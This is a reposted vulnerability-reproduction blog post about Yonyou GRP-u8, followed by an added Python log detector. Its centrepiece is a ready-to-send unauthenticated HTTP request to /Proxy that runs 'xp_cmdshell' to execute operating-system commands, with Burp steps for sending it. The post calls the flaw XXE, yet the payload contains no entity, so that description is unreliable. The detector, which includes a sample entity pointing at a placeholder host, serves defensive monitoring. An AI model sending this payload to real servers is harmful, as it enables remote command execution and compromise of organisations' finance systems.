0x00 Vulnerability Description
Yonyou GRP-u8 has an XXE vulnerability. It is caused by the application not disabling external entity loading when it parses XML input, which allows malicious external files to be loaded.
0x01 Vulnerability Exploitation Conditions
No login required
0x02 Vulnerability Reproduction
POC:
POST /Proxy HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: localhost
Content-Length: 341
Connection: Keep-Alive
Cache-Control: no-cache

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'whoami'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
Capture the request in Burp, change the URL to /Proxy, and add the payload to the body.
0x03 Repair Suggestion
Upgrade to the latest version
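For hosts that cannot be upgraded immediately, requests shaped like the POC can be flagged in proxy or WAF logs. The following is an added example, not code from the original post or from the vendor: it checks the dp parameter of POST requests to /Proxy for DTD/entity declarations and for SQL execution keywords inside PARAM data. The function names, finding labels and indicator patterns are assumptions, and the sample bodies are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit
from xml.etree import ElementTree as ET

# Indicator patterns are assumptions chosen for this example; tune them per environment.
DTD = re.compile(r"<!\s*(?:DOCTYPE|ENTITY)", re.I)
SQL_EXEC = re.compile(r"\b(?:exec(?:ute)?\b|xp_cmdshell|sp_oacreate)", re.I)
XML_DECL = re.compile(r"^\s*<\?xml[^>]*\?>")

def inspect_proxy_request(method, url, body):
    """Return findings for one HTTP request aimed at the /Proxy endpoint."""
    if method.upper() != "POST" or urlsplit(url).path.rstrip("/").lower() != "/proxy":
        return []
    findings = []
    for dp in parse_qs(body).get("dp", []):
        if DTD.search(dp):
            # Assumption: legitimate clients send no DTD, so flag it and never parse it.
            findings.append("dtd-or-entity-declaration")
            continue
        try:
            # Drop the XML declaration so the declared encoding cannot affect parsing.
            root = ET.fromstring(XML_DECL.sub("", dp, count=1))
        except ET.ParseError:
            findings.append("malformed-xml")
            continue
        for param in root.iter("PARAM"):
            name = (param.findtext("NAME") or "").strip()
            data = param.findtext("DATA") or ""
            if SQL_EXEC.search(data):
                findings.append(f"sql-exec-in-param:{name}")
    return findings

def sample_body(data, doctype=""):
    """Build a constructed request body in the shape of the POC above."""
    return ('cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?>' + doctype +
            '<R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION>'
            '<NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>Data</NAME>'
            f'<DATA format="text">{data}</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>')

if __name__ == "__main__":
    dtd = '<!DOCTYPE R9PACKET [<!ENTITY e SYSTEM "http://example.invalid/">]>'
    for label, body in [("poc-shaped", sample_body("exec xp_cmdshell 'whoami'")),
                        ("with-dtd", sample_body("x", dtd)),
                        ("plain", sample_body("DataSetProviderData"))]:
        print(label, inspect_proxy_request("POST", "/Proxy", body))
```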
Please credit when reposting: Adminxe's Blog » UFIDA GRP-u8 XXE Vulnerability Reproduction